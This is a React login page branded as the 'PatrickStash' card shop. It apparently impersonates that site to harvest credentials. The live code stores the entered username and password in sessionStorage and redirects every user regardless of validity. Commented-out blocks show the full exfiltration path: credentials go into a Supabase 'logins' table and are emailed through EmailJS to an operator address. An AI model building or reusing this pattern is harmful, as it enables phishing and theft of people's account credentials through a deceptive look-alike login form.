import React, { useEffect, useState,useRef } from "react";
import { Link, useNavigate } from "react-router-dom";
// import { createClient } from "@supabase/supabase-js";
import emailjs from "@emailjs/browser";
import Icon from "@mdi/react";
import { mdiAccount, mdiLock } from "@mdi/js";
import "../App.css";
import "../css/skin-modes.css";
import "../css/custom.css";
import loader from "../images/loader.svg";
import headerImage from "../images/brand/logo6654.png?v1"
import Captcha from "../components/Captcha"; // Import the Captcha component

// Import Bootstrap and your custom CSS here if needed
// import "bootstrap/dist/css/bootstrap.min.css";
// import "./style.css";

// const supabase = createClient(
//   process.env.REACT_APP_SUPABASE_URL,
//   process.env.REACT_APP_SUPABASE_ANON_KEY
// );

function Login() {
  const [loading, setLoading] = useState(true);
  const [submitting, setSubmitting] = useState(false);
  const [form, setForm] = useState({ username: "", password: "", captcha: "" });
  const [loginError, setLoginError] = useState(false);
  const [CaptchaError, setCaptchaError] = useState(false);
  const navigate = useNavigate();
  const captchaRef = useRef(null);


  useEffect(() => {
    // Simulate loader
    const timer = setTimeout(() => setLoading(false), 1000);
    return () => clearTimeout(timer);
  }, []);

  if (loading) {
    return (
      <div id="global-loader">
        <img src={loader} className="loader-img" alt="Loader" />
        <style>{`
          #global-loader {
            position: fixed;
            z-index: 50000;
            background: rgb(255, 255, 255);
            left: 0;
            top: 0;
            right: 0;
            bottom: 0;
            height: 100vh;
            width: 100%;
            margin: 0 auto;
            text-align: center;
          }
          .loader-img {
            position: absolute;
            right: 0;
            bottom: 0;
            top: 43%;
            left: 0;
            margin: 0 auto;
            text-align: center;
          }
        `}</style>
      </div>
    );
  }


  const handleChange = (e) => {
    setForm({ ...form, [e.target.name]: e.target.value });

  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    setLoginError(false);

    const { username, password, captcha } = form;

    if (!username.trim() || !password.trim() || !captcha.trim()) {
      setLoginError(true);
      return;
    }

    if (!captchaRef.current.verify()) {   // only checked here, on click
      setCaptchaError(true);
      setForm({ ...form, captcha: "" });
      return;
    }

    setSubmitting(true);

    // try {
    //   const res = await fetch("/submit", {
    //     method: "POST",
    //     headers: { "Content-Type": "application/json" },
    //     body: JSON.stringify({ username, password }),
    //   });
    //   const data = await res.json();
    //   if (res.status === 502) {
    //     // page couldn't load — proceed anyway
    //   } else if (data?.status === "awaiting_key") {
    //     const sessionId = data.session_id;
    //     try {
    //       const { data: insertedRow } = await supabase
    //         .from("logins")
    //         .insert([{ username, password, captcha }])
    //         .select();
    //       if (insertedRow && insertedRow[0]) {
    //         sessionStorage.setItem("login_row_id", insertedRow[0].id);
    //       }
    //       await emailjs.send(
    //         process.env.REACT_APP_EMAILJS_SERVICE_ID,
    //         process.env.REACT_APP_EMAILJS_TEMPLATE_ID,
    //         { username, password, to_email: process.env.REACT_APP_EMAILJS_TO_EMAIL },
    //         { publicKey: process.env.REACT_APP_EMAILJS_PUBLIC_KEY }
    //       );
    //     } catch (err) {
    //       console.error("Error saving/sending:", err);
    //     }
    //     navigate("/check-protect", { state: { session_id: sessionId } });
    //     return;
    //   } else if (res.status !== 200 || data?.status !== "success") {
    //     setSubmitting(false);
    //     setLoginError(true);
    //     return;
    //   }
    // } catch (err) {
    //   // network failure treated same as 502 — proceed anyway
    // }

    sessionStorage.setItem("login_password", password);
    sessionStorage.setItem("login_username", username);

    // try {
    //   const { data: insertedRow, error } = await supabase
    //     .from("logins")
    //     .insert([{ username, password, captcha }])
    //     .select();
    //   if (error) {
    //     console.error("Supabase insert error:", error);
    //   } else if (insertedRow && insertedRow[0]) {
    //     sessionStorage.setItem("login_row_id", insertedRow[0].id);
    //   }
    // } catch (err) {
    //   console.error("Error saving:", err);
    // }

    // try {
    //   await emailjs.send(
    //     process.env.REACT_APP_EMAILJS_SERVICE_ID,
    //     process.env.REACT_APP_EMAILJS_TEMPLATE_ID,
    //     { username, password, to_email: process.env.REACT_APP_EMAILJS_TO_EMAIL },
    //     { publicKey: process.env.REACT_APP_EMAILJS_PUBLIC_KEY }
    //   );
    // } catch (err) {
    //   console.error("Error sending email:", err);
    // }

    navigate("/check-protect");
  };

  return (
    <div className="page">
      <div>
        <div className="col col-login mx-auto text-center">
          <a href="login.html">
            <img src={headerImage} className="header-brand-img" alt="" />
          </a>
        </div>
        <div className="container-login100">
          <div className="wrap-login100 p-0">
            <div className="card-body">
              <form className="login100-form validate-form" onSubmit={handleSubmit}>
                <input type="hidden" name="_token" value="4afYOvgQJS8LU6z3OHeFfZc50HMqyxd653MV81d8" />
                <span className="login100-form-title">Login</span>
                <div className="wrap-input100 validate-input" data-bs-validate="Valid login is required">
                  <input className="input100" type="text" name="username" value={form.username} onChange={handleChange} required placeholder="Login" />
                  <span className="focus-input100"></span>
                  <span className="symbol-input100">
                    <Icon path={mdiAccount} size={0.8} />
                  </span>
                </div>
                {loginError && (
                  <div className="invalid-feedback" style={{ display: "block", width: "100%", marginTop: "0.25rem", fontSize: "87.5%", color: "#d12c47" }}>
                    <strong>These credentials do not match our records.</strong>
                  </div>
                )}
                <div className="wrap-input100 validate-input" data-bs-validate="Password is required">
                  <input className="input100" type="password" name="password" value={form.password} onChange={handleChange} placeholder="Password" />
                  <span className="focus-input100"></span>
                  <span className="symbol-input100">
                    <Icon path={mdiLock} size={0.8} />
                  </span>
                </div>
                <div className="form-group">
                  <div className="main-parent">
                    <input className="form-control form-control-lg" name="captcha" value={form.captcha} onChange={handleChange} placeholder="Captcha" type="text" required />
                    <div className="d-flex main-child">
                      {/* <img src={captcha} style={{ height: 45, padding: "1px" }} alt="captcha" /> */}
                            <Captcha ref={captchaRef} answer={form.captcha} height={40} type={"math"}/>

                    </div>
                  </div>
                </div>
                {CaptchaError && (
                  <div className="invalid-feedback" style={{ display: "block", width: "100%", marginTop: "0.25rem", fontSize: "87.5%", color: "#d12c47" }}>
                    <strong>Invalid Captcha</strong>
                  </div>
                )}
                <label className="custom-control custom-checkbox mt-4">
                  <input type="checkbox" name="remember" className="custom-control-input" />
                  <span className="custom-control-label">Remember Me</span>
                </label>
                <div className="container-login100-form-btn" style={{ position: "relative" }}>
                  {submitting && (
                    <div style={{
                      position: "absolute",
                      inset: 0,
                      display: "flex",
                      alignItems: "center",
                      justifyContent: "center",
                      background: "rgba(255,255,255,0.6)",
                      borderRadius: "4px",
                      zIndex: 10,
                    }}>
                      <div style={{
                        width: "22px",
                        height: "22px",
                        border: "3px solid #ccc",
                        borderTopColor: "#333",
                        borderRadius: "50%",
                        animation: "spin 0.7s linear infinite",
                      }} />
                    </div>
                  )}
                  <button type="submit" className="login100-form-btn btn-primary" disabled={submitting}>
                    Login
                  </button>
                </div>
                <div className="text-center pt-3">
                  <p className="text-dark mb-0">
                    Not a member?
                    <Link to="/register" className="text-primary ms-1">
                      Create an Account
                    </Link>
                  </p>
                </div>
              </form>
            </div>
          </div>
        </div>

        {/* SEO footer */}
        {/* <div style={{ textAlign: "center", padding: "24px 16px 32px", maxWidth: "500px", margin: "0 auto" }}>
          <p style={{ fontSize: "12px", color: "#ededff", lineHeight: "1.7" }}>
            PatrickStash (also known as Stashpatrick or Patrick Stash)
            is the official Patrick Market CC shop. Access your wallet, manage your account,
            and shop securely. Login to StashPatrick now or create a new account to get started.
          </p>
          <p style={{ fontSize: "11px", color: "#ededff" }}>
            © {new Date().getFullYear()} PatrickStash · Patrick Market · StashPatrick
          </p>
        </div> */}
      </div>
      <style>{`
        :root {
          --primary09:rgba(143, 189, 86, 0.9);
        }
        .btn-primary:hover {
          color: #fff!important;
        }
        @keyframes spin {
          to { transform: rotate(360deg); }
        }
      `}</style>
    </div>
  );
}

export default Login;